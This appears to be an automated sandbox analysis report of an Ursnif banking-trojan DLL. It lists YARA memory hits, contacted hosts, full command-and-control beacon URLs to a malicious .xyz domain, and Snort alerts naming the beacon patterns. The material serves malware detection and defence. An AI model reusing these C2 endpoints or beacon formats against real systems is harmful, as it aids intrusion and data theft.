Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.20.250.115	plusmailcom.ha-cdn.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
45.90.58.179	taybhctdyehfhgthp2.xyz	Bulgaria	204957	GREENFLOID-ASUA	true
142.250.180.206	www.googleoptimize.com	United States	15169	GOOGLEUS	false
52.97.144.178	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
82.165.229.87	mail.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
52.97.201.50	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.81.146	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.148.226	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.233.34	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
87.248.118.22	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
40.101.137.18	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.1.44	tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
82.165.229.16	wa.mail.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
104.20.185.68	geolocation.onetrust.com	United States	13335	CLOUDFLARENETUS	false
82.165.229.59	www.mail.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
82.165.229.54	wa.ui-portal.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
40.97.116.82	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.136.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
wa.ui-portal.de	82.165.229.54	true
tls13.taboola.map.fastly.net	151.101.1.44	true
www.mail.com	82.165.229.59	true
HHN-efz.ms-acdc.office.com	52.97.201.50	true
wa.mail.com	82.165.229.16	true
www.googleoptimize.com	142.250.180.206	true
contextual.media.net	23.211.6.95	true
outlook.com	40.97.116.82	true
taybhctdyehfhgthp2.xyz	45.90.58.179	true
hblg.media.net	23.211.6.95	true
lg3.media.net	23.211.6.95	true
resolver1.opendns.com	208.67.222.222	true
plusmailcom.ha-cdn.de	195.20.250.115	true
mail.com	82.165.229.87	true
FRA-efz.ms-acdc.office.com	52.97.144.178	true
geolocation.onetrust.com	104.20.185.68	true
edge.gycpi.b.yahoodns.net	87.248.118.22	true
www.msn.com	unknown	unknown
srtb.msn.com	unknown	unknown
img.img-taboola.com	unknown	unknown
outlook.office365.com	unknown	unknown
s.yimg.com	unknown	unknown
web.vortex.data.msn.com	unknown	unknown
s.uicdn.com	unknown	unknown
www.outlook.com	unknown	unknown
img.ui-portal.de	unknown	unknown
plus.mail.com	unknown	unknown
cvision.media.net	unknown	unknown
dl.mail.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/favicon.ico	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw	true	Avira URL Cloud: safe	unknown
http://mail.com/jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw	false		high
http://taybhctdyehfhgthp2.xyz/jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: 2790000.dll

Avira: detected

Found malware configuration

Source: 00000007.00000002.936762270.00000000033D0000.00000040.00000001.sdmp

Machine Learning detection for sample

Source: 2790000.dll

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.loaddll32.exe.10000000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 7.2.rundll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files

Source: 2790000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0462F8CE

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_0462FD33

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49782 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49866 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49882 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49884 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49886 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49888 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49896 -> 45.90.58.179:80

Performs DNS queries to domains with low reputation

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source:	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.97.144.178 52.97.144.178
Source: Joe Sandbox View	IP Address: 40.101.81.146 40.101.81.146

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GREENFLOID-ASUA GREENFLOID-ASUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /jdraw/4TWYD_2BKnV08xS5_/2F7HOCZrKwN0/4Zpub6ftuB_/2BizrVf_2BAEup/ooDnvqHPfcHYlzHuUeiq_/2BOcpQ3mscYC5ZQS/bCsofKuPGmQwD_2/FVd5R5hEPIiJUNt23U/AcieANSDJ/mLDV7I5LTSGIHgpcJd6S/EuKELXcxsS6HB64bzGC/Qm4swXvWNsxPSQQ_2B6aDm/9BguH_2BrAi/sCi.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
